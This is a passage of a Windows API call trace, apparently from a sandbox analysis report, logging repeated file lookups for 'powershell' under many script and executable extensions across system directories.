	[0583.929] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0583.938] SetErrorMode (uMode=0x1) returned 0x1
	[0583.940] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0583.940] SetErrorMode (uMode=0x1) returned 0x1
	[0583.940] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0583.950] SetErrorMode (uMode=0x1) returned 0x1
	[0583.951] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0583.951] SetErrorMode (uMode=0x1) returned 0x1
	[0583.952] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0585.651] SetErrorMode (uMode=0x1) returned 0x1
	[0585.652] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0585.652] SetErrorMode (uMode=0x1) returned 0x1
	[0585.652] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0585.661] SetErrorMode (uMode=0x1) returned 0x1
	[0585.662] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0585.663] SetErrorMode (uMode=0x1) returned 0x1
	[0585.663] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0585.671] SetErrorMode (uMode=0x1) returned 0x1
	[0585.673] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0585.673] SetErrorMode (uMode=0x1) returned 0x1
	[0585.673] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0585.681] SetErrorMode (uMode=0x1) returned 0x1
	[0585.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0585.683] SetErrorMode (uMode=0x1) returned 0x1
	[0585.683] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0585.683] SetErrorMode (uMode=0x1) returned 0x1
	[0585.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0585.684] SetErrorMode (uMode=0x1) returned 0x1
	[0585.684] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0585.684] SetErrorMode (uMode=0x1) returned 0x1
	[0585.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0585.685] SetErrorMode (uMode=0x1) returned 0x1
	[0585.685] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0585.685] SetErrorMode (uMode=0x1) returned 0x1
	[0585.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0585.685] SetErrorMode (uMode=0x1) returned 0x1
	[0585.686] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0585.686] SetErrorMode (uMode=0x1) returned 0x1
	[0585.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0585.686] SetErrorMode (uMode=0x1) returned 0x1
	[0585.686] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0585.687] SetErrorMode (uMode=0x1) returned 0x1
	[0585.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0585.687] SetErrorMode (uMode=0x1) returned 0x1
	[0585.687] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0585.687] SetErrorMode (uMode=0x1) returned 0x1
	[0585.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0585.688] SetErrorMode (uMode=0x1) returned 0x1
	[0585.688] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0585.688] SetErrorMode (uMode=0x1) returned 0x1
	[0585.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0585.689] SetErrorMode (uMode=0x1) returned 0x1
	[0585.689] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0585.689] SetErrorMode (uMode=0x1) returned 0x1
	[0585.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0587.331] SetErrorMode (uMode=0x1) returned 0x1
	[0587.331] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.332] SetErrorMode (uMode=0x1) returned 0x1
	[0587.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0587.332] SetErrorMode (uMode=0x1) returned 0x1
	[0587.332] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.333] SetErrorMode (uMode=0x1) returned 0x1
	[0587.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0587.333] SetErrorMode (uMode=0x1) returned 0x1
	[0587.333] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.333] SetErrorMode (uMode=0x1) returned 0x1
	[0587.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0587.334] SetErrorMode (uMode=0x1) returned 0x1
	[0587.334] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.334] SetErrorMode (uMode=0x1) returned 0x1
	[0587.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0587.334] SetErrorMode (uMode=0x1) returned 0x1
	[0587.335] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.335] SetErrorMode (uMode=0x1) returned 0x1
	[0587.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0587.335] SetErrorMode (uMode=0x1) returned 0x1
	[0587.335] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.336] SetErrorMode (uMode=0x1) returned 0x1
	[0587.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0587.336] SetErrorMode (uMode=0x1) returned 0x1
	[0587.336] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.336] SetErrorMode (uMode=0x1) returned 0x1
	[0587.336] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.337] SetErrorMode (uMode=0x1) returned 0x1
	[0587.337] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.337] SetErrorMode (uMode=0x1) returned 0x1
	[0587.337] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.337] SetErrorMode (uMode=0x1) returned 0x1
	[0587.337] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.338] SetErrorMode (uMode=0x1) returned 0x1
	[0587.338] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.338] SetErrorMode (uMode=0x1) returned 0x1
	[0587.338] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.338] SetErrorMode (uMode=0x1) returned 0x1
	[0587.339] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.339] SetErrorMode (uMode=0x1) returned 0x1
	[0587.339] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.339] SetErrorMode (uMode=0x1) returned 0x1
	[0587.339] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.339] SetErrorMode (uMode=0x1) returned 0x1
	[0587.340] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.340] SetErrorMode (uMode=0x1) returned 0x1
	[0587.340] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.340] SetErrorMode (uMode=0x1) returned 0x1
	[0587.340] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.341] SetErrorMode (uMode=0x1) returned 0x1
	[0587.341] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.341] SetErrorMode (uMode=0x1) returned 0x1
	[0587.341] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.341] SetErrorMode (uMode=0x1) returned 0x1
	[0587.342] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.342] SetErrorMode (uMode=0x1) returned 0x1
	[0587.342] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.342] SetErrorMode (uMode=0x1) returned 0x1
	[0587.342] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.342] SetErrorMode (uMode=0x1) returned 0x1
	[0587.343] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c7ed920 | out: lpFindFileData=0x1c7ed920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0587.343] SetErrorMode (uMode=0x1) returned 0x1
	[0587.343] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7ed780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0587.343] SetErrorMode (uMode=0x1) returned 0x1
